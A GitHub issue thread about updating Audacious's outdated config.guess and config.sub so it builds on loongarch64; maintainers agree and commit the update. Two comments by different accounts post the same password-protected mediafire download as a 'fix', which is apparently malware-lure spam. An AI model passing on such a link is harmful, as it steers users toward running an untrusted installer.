### ISSUE TITLE
Update config.guess and config.sub

### ISSUE THREAD

**Issue by LinuxResearcher** [audacious-media-player/audacious#1458]
**Describe the bug**
Can't be built on some new instruction set computer.

**Steps to reproduce**
When I build audacious, I get some error information like this:
```
checking build system type... ./build-aux/config.guess: unable to guess system type

This script, last modified 2013-06-10, has failed to recognize
the operating system you are using. It is advised that you
download the most up to date version of the config scripts from

  http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=config.guess;hb=HEAD
and
  http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=config.sub;hb=HEAD

If the version you run (./build-aux/config.guess) is already up to date, please
send the following data and any information you think might be
pertinent to <config-patches@gnu.org> in order to provide the needed
information to handle your system.

config.guess timestamp = 2013-06-10

uname -m = loongarch64
uname -r = 6.10.0-2
uname -s = Linux
uname -v = #1 SMP PREEMPT Mon, 19 Aug 2024 06:05:26 +0000

/usr/bin/uname -p = unknown
/bin/uname -X     = 

hostinfo               = 
/bin/universe          = 
/usr/bin/arch -k       = 
/bin/arch              = 
/usr/bin/oslevel       = 
/usr/convex/getsysinfo = 

UNAME_MACHINE = loongarch64
UNAME_RELEASE = 6.10.0-2
UNAME_SYSTEM  = Linux
UNAME_VERSION = #1 SMP PREEMPT Mon, 19 Aug 2024 06:05:26 +0000
configure: error: cannot guess build type; you must specify one
```
In order to build audacious, we must replace config.guess and config.sub with the latest version.
Config.guess and config.sub in Audacious is 11 years ago, It is too old to build on some new instruction set computer, like loongarch, riscv64, etc.

**Expected behavior**
So, could you place update config.guess and config.sub to the latest version for audacious and audacious-plugins?
Sorry for my terrible English.

**Additional information**
* Audacious version and interface (Qt / GTK / Winamp)
* Operating system and version
* Desktop environment
* Screenshots
* Sample files
* Logs (use `LANG=C audacious -V` for English output)

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LinuxResearcher** [comment]
> to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in install to path and select "gcc."

Hello, I am using Linux and my CPU is Loongson 3A6000, not X86. I am building the project, not install. Just update config.guess and config.sub could solve my problem.

**Comment by radioactiveman** [comment]
Have you tried updating the files? Does the build work then on your system?
And we recommend to use Meson for building Audacious. Autotools support is only kept for backwards compatibility.

@jlindgren90: Do you think we should update the files? I can't estimate the risk of regressions.

**Comment by LinuxResearcher** [comment]
> Have you tried updating the files? Does the build work then on your system? And we recommend to use Meson for building Audacious. Autotools support is only kept for backwards compatibility.
> 
> @jlindgren90: Do you think we should update the files? I can't estimate the risk of regressions.

Hello!
Yes, I update the files and build successfully on my system with using configure.
And by my test, if I don't update the files, I can build successfully with using Meson.
I noticed meson.build just after your reply, Thanks!

**Comment by jlindgren90** [comment]
Updating config.guess and config.sub is probably fine, but I would not do it between point releases (4.4.x). Just prior to a 4.5-beta would be a good time.

**Comment by radioactiveman** [comment]
Should be fixed now with https://github.com/audacious-media-player/audacious/commit/5aa135a2471aaec8ab323c1dbda8ca1a65339b5b, thanks for reporting.

**Comment by LinuxResearcher** [comment]
> Should be fixed now with https://github.com/audacious-media-player/audacious/commit/5aa135a2471aaec8ab323c1dbda8ca1a65339b5b, thanks for reporting.

Thank you！
